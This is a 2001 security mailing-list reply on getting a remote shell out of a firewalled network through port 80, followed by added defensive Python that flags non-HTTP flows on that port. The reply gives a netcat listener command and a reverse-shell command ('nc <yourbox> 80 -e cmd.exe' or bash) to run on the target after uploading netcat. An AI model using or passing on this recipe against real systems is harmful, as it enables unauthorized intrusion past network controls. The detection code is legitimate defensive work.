Re: Server initiated remote shell

From: Bill Pennington (billp@boarder.org)
Date: 09/21/01


Message-ID: <3BABB64C.5571983@boarder.org>
Date: Fri, 21 Sep 2001 14:51:08 -0700
From: Bill Pennington <billp@boarder.org>
To: Ilici Ramirez <ilici_ramirez@yahoo.com>
Subject: Re: Server initiated remote shell

You want netcat, you can find it on packetstorm.

What you will need to do first is build a CGI/ASP script to upload your
code, assuming you can't just tftp it from the internal system.

Then on your box execute:

nc -l -p 80

On the remote server execute

nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or
whatever command interpreter is handy. You will then see a command prompt
appear on your local box.

Sounds like the hard part will be getting netcat on the box. Good luck!

Ilici Ramirez wrote:
>
> Hi,
>
> Let's suppose that I can execute a program on an inside
> host on a network protected by a firewall. There is no
> way in. But there is a way out to www browsing on port
> 80.
>
> So the client could connect to any Internet address on
> port 80. What program should it execute to provide me
> with a shell? Of course I'm on the Internet with a
> listener. What listener?
>
> The firewall is a real stateful firewall so no TCP
> ACK or ICMP encapsulations.
>
> Have a nice weekend too.
>
> Ilici R
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please see:
> https://alerts.securityfocus.com/

-- 

Bill Pennington - CISSP
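
Added example, not part of the original post or of netcat: a defender-side check for the egress case discussed in this thread, where a stateful firewall permits outbound port 80 without inspecting the protocol. It flags port-80 flows in which the server speaks first or the client's first bytes are not an HTTP request line. The Flow record, the sample flows and all addresses are constructed for illustration, and the check assumes the request line arrives in the first client segment.

```python
import re
from typing import NamedTuple, Optional

class Flow(NamedTuple):
    src: str              # inside host that opened the connection
    dst: str              # outside host
    dport: int
    first_sender: str     # "client" or "server": who sent application data first
    first_payload: bytes  # first application bytes seen on the flow

# HTTP/1.x request line: METHOD SP request-target SP HTTP/x.y CRLF
REQUEST_LINE = re.compile(rb"[A-Z]+ \S+ HTTP/\d\.\d\r\n")

def classify(flow: Flow) -> Optional[str]:
    """Return a reason string if the flow does not behave like HTTP, else None."""
    # In HTTP the client always speaks first. A shell that prints no banner
    # sends nothing until the remote end types a command.
    if flow.first_sender != "client":
        return "server spoke first"
    # A shell that prints a banner sends it where the request line should be.
    if not REQUEST_LINE.match(flow.first_payload):
        return "client data is not an HTTP request line"
    return None

def flag_non_http(flows, port=80):
    """Return (src, dst, reason) for each flow to `port` that fails the check."""
    hits = []
    for f in flows:
        if f.dport != port:
            continue
        reason = classify(f)
        if reason:
            hits.append((f.src, f.dst, reason))
    return hits

# Constructed sample flows (documentation address ranges, made-up payloads).
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "198.51.100.7", 80, "client",
         b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"),
    Flow("10.0.0.9", "203.0.113.20", 80, "client",
         b"Microsoft Windows 2000 [Version 5.00.2195]\r\n"),
    Flow("10.0.0.12", "203.0.113.20", 80, "server", b"dir\r\n"),
    Flow("10.0.0.5", "198.51.100.7", 443, "client", b"\x16\x03\x01"),
]

if __name__ == "__main__":
    for hit in flag_non_http(SAMPLE_FLOWS):
        print(hit)
```

The same rule is what a protocol-aware HTTP proxy enforces inline: forcing outbound web traffic through one closes the raw port-80 path the question relies on.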
